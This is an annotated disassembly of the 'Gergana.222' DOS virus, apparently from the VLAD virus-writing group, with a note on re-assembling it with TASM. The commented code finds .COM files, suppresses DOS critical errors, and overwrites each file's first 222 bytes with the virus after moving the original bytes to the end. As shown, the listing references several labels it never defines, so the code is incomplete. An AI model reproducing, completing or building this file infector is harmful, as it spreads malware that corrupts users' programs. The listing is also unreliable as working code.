; Gergana.222
; disassembly by Metabolis/VLAD
; with a small amount of help from Qark :)
; I thought it would be interesting since it infects the start of
; files whereas most will append.
; Of course the virus is from Bulgaria, but did you know Gergana
; is a female Bulgarian name? ;)
; use TASM to re-assemble
int24s equ 12h ; original int 24h
int24o equ 14h ; handler location
dtapos equ 80h ; DTA position in memory
fbuffer equ 0FA00h ; 222 byte buffer
inf_flag equ 0FA46h ; infection flag
tempdta equ 0FF80h ; Where to store temp DTA
filename equ 0FF9Eh ; Where the filename is :)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
gerg_222 proc far
mov ax,flength
push ax
mov dx,tempdta ; Temporarily store
mov ah,1Ah ; DTA at address tempdta
int 21h ; Set DTA to buffer
mov cx,20h ; attributes to search for
mov dx,offset filemask ; '*.COM'
mov ah,4Eh ; Find 1st file matching the
int 21h ; above string..
jc finish_up ; uh oh.. no files!
mov dx,offset int_24h_entry ; Attach the new error
mov ax,2524h ; handling procedure to
int 21h ; int 24h :)
mov dx,filename ; open file with filename
mov ax,3D02h ; to read
int 21h
jc find_next ; can't open! goto find_next
xchg bx,ax ; put file handle into BX
mov cx,0DEh ; read 222 bytes
mov dx,fbuffer ; into fbuffer
mov ah,3Fh
int 21h
jnc infect ; no error goto infect
call close_file
mov ah,4Fh
int 21h ; find next file!
jc finish_up ; no files, goto finish_up
jnc read_virus ; open and read the virus!
gerg_222 endp
close_file proc near
mov ah,3Eh
int 21h ; close file with handle
; in BX
close_file endp
filemask db '*.COM', 00h ; file mask for search
flength dw 0DEh ; file length
write_virus proc near
mov ah,40h ; write the virus (222 bytes)
mov cx,0DEh
int 21h
write_virus endp
mov cx,cs:inf_flag
cmp cx,2E2Ah
je find_next ; if file infected, find next
mov ax,4202h
xor cx,cx ; lseek to the end of the
xor dx,dx ; file
int 21h
cmp ax,0C350h ; if file is bigger than
ja find_next ; 50000 don't infect
cmp ax,100h ; if file is smaller than
jb find_next ; 256 don't infect
mov flength,ax ; put file length in flength
mov dx,fbuffer ; point to the file buffer
call write_virus ; write the 222 bytes which
; were originally at the
; start of the infected
; program
jc find_next ; no can do, find next!
mov ax,4200h
xor cx,cx ; seek to the beginning
xor dx,dx ; of the file using
int 21h ; the file handle BX
mov dx,100h ; from 100h (which is where
call write_virus ; the virus is)
jc find_next ; nope, find another file!
call close_file ; infected! close the file
mov dx,cs:int24s ; return the error handling
mov ax,cs:int24o ; interrupt 24h to its
mov ds,ax ; previous state
mov ax,2524h
int 21h
push cs
pop ds
mov ah,1Ah
mov dx,dtapos ; set DTA back to original
int 21h ; position 80h
mov si,offset execute_original
mov di,tempdta
mov cx,30h
rep movsb ; move 30 bytes from the
; execute original code
; to the tempdta storage
jmp $-237h ; jump back 567 bytes to
; execute the next part
; of the program
pop si ; prolly points to here
add si,100h ; add start of com address
mov di,100h ; set destination as 100h.
mov cx,0deh ; virus length.
repz movsb ; move original code back.
mov ax,100h
jmp ax ; return to original code.
copyright db 'Gergana II -BUL' ; authors signature
int_24h_entry proc far
xor ax,ax ; Zero register
iret ; Interrupt return
int_24h_entry endp
db 90h, 90h,0CDh, 20h ; First 4 bytes of infectee
seg_a ends
end start